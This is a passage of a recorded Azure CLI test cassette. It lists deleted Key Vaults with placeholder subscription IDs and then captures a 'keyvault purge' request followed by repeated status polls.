0000-0000-000000000000/resourceGroups/testcmdportal2/providers/Microsoft.KeyVault/vaults/testcmdportal2-kv","location":"centralus","tags":{},"deletionDate":"2020-01-26T17:11:23Z","scheduledPurgeDate":"2020-04-25T17:11:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/testcmdportal-kv","name":"testcmdportal-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/testcmdportal/providers/Microsoft.KeyVault/vaults/testcmdportal-kv","location":"centralus","tags":{},"deletionDate":"2020-01-26T17:11:23Z","scheduledPurgeDate":"2020-04-25T17:11:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestf6lq7ziokqh3dkpsg","name":"clitestf6lq7ziokqh3dkpsg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg2mhmykqhsgxq7knbacrxrfbiir4dfmsyz5mbjtwfuecpjg4loqxmtl3rwvot2mr2r/providers/Microsoft.KeyVault/vaults/clitestf6lq7ziokqh3dkpsg","location":"southcentralus","tags":{},"deletionDate":"2020-03-20T18:25:05Z","scheduledPurgeDate":"2020-06-18T18:25:05Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest3zvxu4rsr6tqumcsy","name":"clitest3zvxu4rsr6tqumcsy","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgtj3rssqbhzbatcnt3twclix7b52rdvnfwmrcwsiusvh3ixk2dlttbwnbjkh4hkl2o/providers/Microsoft.KeyVault/vaults/clitest3zvxu4rsr6tqumcsy","location":"southcentralus","tags":{},"deletionDate":"2020-03-19T08:12:57Z","scheduledPurgeDate":"2020-06-17T08:12:57Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest42h57eiz6tts7wv2o","name":"clitest42h57eiz6tts7wv2o","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgody7efo5s76evefykui2msh64z65vkb2xzjli46qlkyp5pze6kjmemsloeb5zq5zx/providers/Microsoft.KeyVault/vaults/clitest42h57eiz6tts7wv2o","location":"southcentralus","tags":{},"deletionDate":"2020-03-13T18:33:21Z","scheduledPurgeDate":"2020-06-11T18:33:21Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitesttwwerfe7vawtehhji","name":"clitesttwwerfe7vawtehhji","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgfrygla3nlekzul3b5sn4aqa2l2yk47nhnrprl6a6d2x26kgpoy2leixtkopl25pwq/providers/Microsoft.KeyVault/vaults/clitesttwwerfe7vawtehhji","location":"southcentralus","tags":{},"deletionDate":"2020-03-06T18:52:59Z","scheduledPurgeDate":"2020-06-04T18:52:59Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/ygcmkkv","name":"ygcmkkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygcmk/providers/Microsoft.KeyVault/vaults/ygcmkkv","location":"southcentralus","tags":{},"deletionDate":"2020-03-06T14:11:15Z","scheduledPurgeDate":"2020-06-04T14:11:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","location":"westus","tags":{},"deletionDate":"2020-03-23T10:21:49Z","scheduledPurgeDate":"2020-04-09T10:21:49Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-xe3nrma","name":"cli-test-kv-mgmt-xe3nrma","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt3brblwljugzseunt26lvrdx2zoqhsdhlhm4rhzlrksiznpg63kglv/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-xe3nrma","location":"westus","tags":{},"deletionDate":"2020-03-23T07:45:41Z","scheduledPurgeDate":"2020-06-21T07:45:41Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-slpaykn","name":"cli-test-kv-mgmt-slpaykn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtnpnuy6uncav5scer37yb4xpwe524zlmzqmwtktdf7j76hyj472qk5/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-slpaykn","location":"westus","tags":{},"deletionDate":"2020-03-22T05:33:55Z","scheduledPurgeDate":"2020-06-20T05:33:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-4bafqr","name":"cli-test-kv-se-sd-4bafqr","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletexseygm6zy2bkojevjjurz7uck6i6ahbvuye6bkk/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-4bafqr","location":"westus","tags":{},"deletionDate":"2020-03-22T05:30:41Z","scheduledPurgeDate":"2020-06-20T05:30:41Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-iyqyku","name":"cli-test-kv-se-sd-iyqyku","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletelwy6ql3akqidtxeqcvuokb2nuf2xlchtkpcasbw/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-iyqyku","location":"westus","tags":{},"deletionDate":"2020-03-21T14:43:21Z","scheduledPurgeDate":"2020-06-19T14:43:21Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-nblk54xr2ky27b","name":"vault-nblk54xr2ky27b","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_nyintdokzcbvouvsn74gvltn7kwegt75iwzqc3d354vx2x/providers/Microsoft.KeyVault/vaults/vault-nblk54xr2ky27b","location":"westcentralus","tags":{},"deletionDate":"2020-03-23T09:07:31Z","scheduledPurgeDate":"2020-06-21T09:07:31Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-onccbbmfasmsmn","name":"vault-onccbbmfasmsmn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_sjlxi6j4kfqx7vinw25fdke6iamh4lctajcikusdnzyrkw/providers/Microsoft.KeyVault/vaults/vault-onccbbmfasmsmn","location":"westcentralus","tags":{},"deletionDate":"2020-03-20T18:41:55Z","scheduledPurgeDate":"2020-06-18T18:41:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-rci35nsn37ak3","name":"vault4-rci35nsn37ak3","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_j2eeh3jbr33nl6kvutnl4zxlngw5srnbi52zi/providers/Microsoft.KeyVault/vaults/vault4-rci35nsn37ak3","location":"westcentralus","tags":{},"deletionDate":"2020-03-20T18:35:55Z","scheduledPurgeDate":"2020-06-18T18:35:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-qu6vguhdwlaui","name":"vault3-qu6vguhdwlaui","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_ues3ormjmqfphd3p62tfg6rr3ian4upxso/providers/Microsoft.KeyVault/vaults/vault3-qu6vguhdwlaui","location":"westcentralus","tags":{},"deletionDate":"2020-03-20T18:35:11Z","scheduledPurgeDate":"2020-06-18T18:35:11Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1567","name":"vault1567","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest1567/providers/Microsoft.KeyVault/vaults/vault1567","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T14:52:14Z","scheduledPurgeDate":"2020-06-17T14:52:14Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus2/deletedVaults/byokacraccr-kv","name":"byokacraccr-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/byokacraccr/providers/Microsoft.KeyVault/vaults/byokacraccr-kv","location":"westus2","tags":{},"deletionDate":"2020-01-12T17:14:08Z","scheduledPurgeDate":"2020-04-11T17:14:08Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus2/deletedVaults/yugangwwu2-kv","name":"yugangwwu2-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwwu2/providers/Microsoft.KeyVault/vaults/yugangwwu2-kv","location":"westus2","tags":{},"deletionDate":"2020-01-06T17:13:54Z","scheduledPurgeDate":"2020-04-05T17:13:54Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvault1","name":"zuhvault1","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvault1","location":"eastus2euap","tags":{},"deletionDate":"2020-03-12T15:12:04Z","scheduledPurgeDate":"2020-06-10T15:12:04Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvault2","name":"zuhvault2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvault2","location":"eastus2euap","tags":{},"deletionDate":"2020-03-12T15:12:04Z","scheduledPurgeDate":"2020-06-10T15:12:04Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvault","name":"zuhvault","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvault","location":"eastus2euap","tags":{},"deletionDate":"2020-03-12T15:12:04Z","scheduledPurgeDate":"2020-06-10T15:12:04Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/ygtestkv","name":"ygtestkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/test/providers/Microsoft.KeyVault/vaults/ygtestkv","location":"eastus2euap","tags":{},"deletionDate":"2020-03-02T04:46:15Z","scheduledPurgeDate":"2020-05-31T04:46:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvalut","name":"zuhvalut","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvalut","location":"eastus2euap","tags":{},"deletionDate":"2020-01-21T06:58:01Z","scheduledPurgeDate":"2020-04-20T06:58:01Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/ygmanualcmkkv","name":"ygmanualcmkkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygmanualcmk/providers/Microsoft.KeyVault/vaults/ygmanualcmkkv","location":"centraluseuap","tags":{},"deletionDate":"2020-02-25T17:11:25Z","scheduledPurgeDate":"2020-05-25T17:11:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/cmkacrkv","name":"cmkacrkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cmk/providers/Microsoft.KeyVault/vaults/cmkacrkv","location":"centraluseuap","tags":{},"deletionDate":"2020-02-25T17:11:25Z","scheduledPurgeDate":"2020-05-25T17:11:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/ygcmk","name":"ygcmk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cmk/providers/Microsoft.KeyVault/vaults/ygcmk","location":"centraluseuap","tags":{},"deletionDate":"2020-02-23T17:11:27Z","scheduledPurgeDate":"2020-05-23T17:11:27Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/vault15871","name":"vault15871","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yurg/providers/Microsoft.KeyVault/vaults/vault15871","location":"centraluseuap","tags":{},"deletionDate":"2020-01-13T17:11:21Z","scheduledPurgeDate":"2020-04-12T17:11:21Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZftjuI2FIbvBVX9VQYnQBdGWlUBO2zoHGdtbFbhHxPCh83AaGCW4NXee9%2b027kHkIiUSFaQH78fJz9ah6o%2bP%2b0O%2ftR6%2fNGSuTZfxkIanTzZWeuxtT2fX0%2bPnc7L8rDcVC%2fV4fywDO9v1UN5fOmc3p9P5dvu9bw7Hk4d9hyt%2f%2bx9itrR85q1e6vVsr2sym67fB7Gn%2bI1G%2faHrPP6dvy%2bW1Vvpw7tyrfj6bg%2bP%2fxdXefL9%2f25s6r21bla%2fftw%2bmv5umt%2fx0q8%2fHPMomGb4Rf9%2ftvJ4x%2bPvjp8tn7%2bTc%2bnRludGjG3MzvMn%2bzernkWkdlcJReMnL%2fkPKnJUU18PyC%2bTYlnPcmyvjQZ1sxFzvcT5XwvN6NRbhYjCkmtXdn6oyWSmbl5DnXOyx72H6TLupKXfXLbgQxakBdXEjbWxseS24sy%2b5G0tlY%2bY7lVYANWLgGHb2JmhNX5V3HjmmhYdHPjo0Yb0m2gCT3I7SKVQsXSTJvz55KrmMJWgEskTXnVPutrayNtsl%2baSGZZcgckoATCyWOXIYE6tgNicixdOiIjYumLAFX0lNn0ZVBYs%2bDEbJ1DIXAXSMxya740FrkDHFfCFsnYi%2bSEwPA9yUcDCtOxNAgGDoMIPW5MQiwLMA1TZjWRZi9glJpC8REW8e3rAmftsj4FnLPzXQp6oOEK7SzSdDtRRnIpilgFzwCsCxCp5kUtXdKVjADibgqEXIYtC2zNXyF5yH40gB5i6VapMjYmtxpJjiANG9wnsTLimgvBtJmmuVD%2fW%2bReeDTh2W9YwCMoy80VYTlQbnORbppqU8YkNKQhurkV8FKBEtEpmcWEbIZCteDRFMntFyrisI9MwEUYIpIe8XSgbRakQHx6FK2QqeTFRYtUIEZjMtNJztUFrK6KiV8c7kYWMhRdMhn6U6BRElgF0WmKCzVzhBCQBzBwG0EWQYXVWDIkCEOUuqymDxx2duvRiQ7xMYYLgLCNNhihQ7SnWLn5CL2BobNAr0yRF9uRYkVXOwK4Ta3FfKx544%2f%2fBs5Y2OTrjffIlVyJ6co3oRFwj%2fligekbQWDRJcZfpFGYRlcpVNGoposYjZWnSFoVpG9gfBjkLnAEjFqGgKOpUWiBTwfkYQSHK2CGEBZD6RQfJ54pixzhSSA%2fnWihoI%2bi9fPnPw%3d%3d"}' headers: cache-control: - no-cache content-length: - '26903' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:58 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - e21404f3-399c-4e2b-a2eb-a0253f78eed6 - c40d52be-de1c-490e-91d8-bea839943636 - 31f26586-642f-4185-ad26-172fadfd1420 - 1abd54fb-3370-4292-b205-f82d2de19d3d - ac074c7b-0d06-422b-9f20-10099671c9ef - a3e34e88-20cc-423b-9643-4dc7d7215fba - c8589fd7-480d-47e0-8340-cf4d725f1a23 - febfef51-24a6-45c8-ba2c-9f4d8de7cd76 - 1f7768b3-0183-4b6a-bc40-3d1d31ebbcb9 - 25c12aa1-cedc-456d-9379-70f437cd775e - 384f5d43-9076-4fbf-afc0-faffe860cbde - 8c323f20-0902-4c1f-957c-26b1a651b3ea - 266a0f73-ba9a-417f-be6a-b7b35ce6b14e - daf6042b-edb5-4cfd-ad60-97e62574a2da - 396ef622-fae2-48db-97da-4707298eb1cb - 4889d974-8cc4-48e9-b915-b78ca3d92196 - 96b3e72c-2cce-4b3e-833f-3af6f27b3273 - 024aa1d0-cf85-47a2-8b6d-0179b7928a84 - ff7262cf-4d0e-47a5-b901-9db1b66899a2 - eac699f1-e9c5-45bd-b8cf-c5714d7d349c - 39a097c9-ba4f-44dd-9cf1-1388b3a5aa90 - 6bc46653-520b-48cf-9f23-6bc6c269a44b - 6c5aad40-cc4b-4887-99a5-37e10240835f - 5e1cfe45-ce50-45a0-834e-61534e6bfc0f - 0b05b28d-20c5-4e0b-aed0-73c22f79a6a6 - 4d98841b-158b-4eb7-8226-b05445ca316e - caa9f7aa-63f6-457e-98ab-fc29c938317c - 37431c1b-786e-485a-8bde-8f345a2bb6f1 - ef8a1866-5194-4b40-9c72-fa7768ffe23e - d5dbfc53-d377-4e1c-8028-b4630353c518 - dda52da5-7077-484b-8e49-6f7f60f85638 - 9c1a0ff2-de3a-4b4e-b29e-93a14c6cc5dd - 1fa181ce-0e21-4803-a291-1009d2715d15 - be311d31-485b-4f5a-8d85-23e34deaefc7 - ab54f373-442f-4aab-9c01-1ff6b0fc645b status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive Content-Length: - '0' ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: POST uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-000002/purge?api-version=2019-09-01 response: body: string: '' headers: cache-control: - no-cache content-length: - '0' date: - Mon, 23 Mar 2020 10:22:00 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1199' x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:07 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:12 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:17 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:22 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:28 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:33 GMT expires: - '-1' 